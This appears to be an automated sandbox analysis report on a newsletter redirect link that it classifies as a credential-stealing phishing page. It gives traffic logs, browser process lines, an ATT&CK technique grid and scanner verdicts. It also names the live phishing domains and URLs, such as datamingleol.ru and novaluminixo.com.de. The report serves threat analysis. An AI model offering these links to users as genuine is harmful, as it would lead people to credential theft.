          Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tN2d/, HTTP/1.1Host: datamingleol.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://datamingleol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: novaluminixo.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: link.sbstck.com
          Source: global trafficDNS traffic detected: DNS query: link.mail.beehiiv.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: maxcarerelocation.com
          Source: global trafficDNS traffic detected: DNS query: datamingleol.ru
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: novaluminixo.com.de
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3112sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 245501c248c6a2esec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 13:15:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c2868b5d9906a58-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 13:16:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: F76NhAdS5WO5heJ7HDcVscv92lh3YHI7E3Y=$l5Ec1GXIdxOOjRboServer: cloudflareCF-RAY: 8c2868cbfdb48ce2-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 13:16:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: KPqQ/Q12CvwSCqGxaKao5dwTT+zTGZ1XGko=$eBAbNMqab4kzYaYFServer: cloudflareCF-RAY: 8c2868e4abef0fa4-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 13:16:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: AKlMEBNLf7nR+3ZRqTFhxekjY8anYf3OeNs=$LSl7Xn/l7qwBL1PGcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8c2869322e40c339-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 13:16:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c28695d086441f2-EWRalt-svc: h3=":443"; ma=86400
          Source: chromecache_62.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
          Source: chromecache_62.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
          Source: chromecache_58.2.drString found in binary or memory: https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#about
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#classic-cars
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#contact
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#electric-vehicles
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#faq
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#learn-more
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#modern-supercars
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#privacy
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#services
          Source: chromecache_62.2.drString found in binary or memory: https://novaluminixo.com.de/#terms
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: classification engineClassification label: mal100.phis.win@21/20@32/10
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2688 --field-trial-handle=1900,i,13536425963766197669,2615217112724930602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2688 --field-trial-handle=1900,i,13536425963766197669,2615217112724930602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Scripting
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Deobfuscate/Decode Files or Information
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1510815 URL: http://link.sbstck.com/redi... Startdate: 13/09/2024 Architecture: WINDOWS Score: 100 24 Antivirus / Scanner detection for submitted sample 2->24 26 AI detected phishing page 2->26 28 Yara detected HtmlPhish70 2->28 30 7 other signatures 2->30 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49664 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 novaluminixo.com.de 188.114.96.3, 443, 49735, 49738 CLOUDFLARENETUS European Union 11->18 20 datamingleol.ru 11->20 22 8 other IPs or domains 11->22

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e30%Avira URL Cloudsafe
          http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e30%Avira URL Cloudsafe
          https://novaluminixo.com.de/#modern-supercars0%Avira URL Cloudsafe
          https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13aPN2aWg8H0AZlaYIbwj-2B5XCPZJrYLR6gCX2KglI5rt-2BhosHmI3CIqw-2Baty2WnLa_5fUuPhWAFqmONK4vCqUUyg-2FVOuPn0yylbEGIy-2BMc2pKH-2FwT7XuJE6N4PO67SRFwySQfum6vpDJ012hBFpTMU70W7Buir5ITVUf4LKn1Jv3b9pmU2VE9FhtalGjGwNilzoSAQqq5GJ-2FYB4GD3Q-2Bxi0yZ0veGliTbI5N6309WAW1tAR5CJ0NAA3kd01PnWFZtXGE2PY7nO0TG-2BRlhqE6O-2BZ73glfaX9R5tgL90omfK9VLfe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&utm_source=substack&utm_medium=email0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#0%Avira URL Cloudsafe
          https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3D0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/turnstile/v0/api.js0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#contact0%Avira URL Cloudsafe
          https://code.jquery.com/jquery-3.6.0.min.js0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=auto0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#learn-more0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#classic-cars0%Avira URL Cloudsafe
          https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF50%Avira URL Cloudsafe
          https://novaluminixo.com.de/#terms0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#about0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3D0%Avira URL Cloudsafe
          https://datamingleol.ru/favicon.ico0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js0%Avira URL Cloudsafe
          https://maxcarerelocation.com/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review0%Avira URL Cloudsafe
          https://datamingleol.ru/tN2d/,0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8c2868a8da4d78e7/1726233357437/2e79c4b32ab76a8fbdddaf68a3bf5979d979c70dab68905b80a2d24b32c452d1/aclfuHDbeXB-GT00%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#faq0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv0%Avira URL Cloudsafe
          https://novaluminixo.com.de//0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#privacy0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#electric-vehicles0%Avira URL Cloudsafe
          https://novaluminixo.com.de/#services0%Avira URL Cloudsafe

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          199.232.210.172
          truefalse
            unknown
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              unknown
              code.jquery.com
              151.101.66.137
              truefalse
                unknown
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  unknown
                  link.mail.beehiiv.com
                  104.18.68.40
                  truefalse
                    unknown
                    challenges.cloudflare.com
                    104.18.95.41
                    truefalse
                      unknown
                      maxcarerelocation.com
                      45.67.14.24
                      truefalse
                        unknown
                        www.google.com
                        142.250.185.228
                        truefalse
                          unknown
                          datamingleol.ru
                          188.114.96.3
                          truetrue
                            unknown
                            novaluminixo.com.de
                            188.114.96.3
                            truetrue
                              unknown
                              link.sbstck.com
                              188.114.97.3
                              truefalse
                                unknown
                                fp2e7a.wpc.phicdn.net
                                192.229.221.95
                                truefalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://a.nel.cloudflare.com/report/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3Dfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  • Avira URL Cloud: safe
                                  unknown
